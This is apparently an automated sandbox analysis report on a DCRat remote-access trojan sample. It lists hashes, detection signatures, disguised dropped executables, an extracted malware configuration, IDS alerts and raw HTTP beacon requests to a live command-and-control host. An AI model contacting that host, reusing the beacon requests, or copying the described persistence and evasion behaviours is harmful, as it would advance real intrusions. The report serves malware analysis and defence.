Windows Analysis Report
4KjLUaW30K.exe

Overview

General Information

Sample name: 4KjLUaW30K.exe (renamed because original name is a hash value)
Original sample name: 181d043c0617914801548f09d5b776d4.exe
Analysis ID: 1561676
MD5: 181d043c0617914801548f09d5b776d4
SHA1: 757f042065a3dc2c9f73e635b41f83591c8ad647
SHA256: 501aa5f94b15b8716ef7f76e2dbdc146b436cd9e72274d6ec5dec7265706c0ad
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable UAC (promptonsecuredesktop)
Disables UAC (registry)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: 4KjLUaW30K.exe Avira: detected
Source: http://a1043195.xsph.ru/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/ Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\System.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"SCRT": "{\"d\":\".\",\"1\":\"%\",\"I\":\"@\",\"U\":\" \",\"5\":\"(\",\"J\":\"*\",\"M\":\"&\",\"A\":\"-\",\"T\":\")\",\"C\":\",\",\"B\":\"_\",\"L\":\"^\",\"R\":\"~\",\"y\":\">\",\"i\":\"!\",\"0\":\"`\",\"V\":\"<\",\"G\":\"$\",\"E\":\"|\",\"9\":\"#\",\"3\":\";\"}", "PCRT": "{\"F\":\"&\",\"W\":\">\",\"X\":\"^\",\"2\":\"`\",\"0\":\",\",\"S\":\";\",\"u\":\"-\",\"G\":\"_\",\"J\":\"*\",\"C\":\"#\",\"Q\":\"@\",\"U\":\"<\",\"c\":\" \",\"b\":\"(\",\"d\":\"!\",\"z\":\"%\",\"T\":\"|\",\"V\":\")\",\"k\":\".\",\"R\":\"$\",\"a\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-lWaBBBPi9nde67B22ADT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false}
Source: a1043195.xsph.ru Virustotal: Detection: 11%
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe ReversingLabs: Detection: 83%
Source: C:\Recovery\System.exe ReversingLabs: Detection: 83%
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe ReversingLabs: Detection: 83%
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe Virustotal: Detection: 68%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Joe Sandbox ML: detected
Source: C:\Recovery\System.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe Joe Sandbox ML: detected
Source: 4KjLUaW30K.exe Joe Sandbox ML: detected
Source: 4KjLUaW30K.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 4KjLUaW30K.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49732 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49708 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49759 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49786 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49836 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49878 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49897 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49913 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49955 -> 141.8.192.93:80
Source: Joe Sandbox View IP Address: 141.8.192.93 141.8.192.93
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: global traffic HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1 Accept: */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1 Accept: */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1 Accept: */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1 Accept: */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1 Accept: */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: a1043195.xsph.ru Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1 Accept: */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru Connection: Keep-Alive
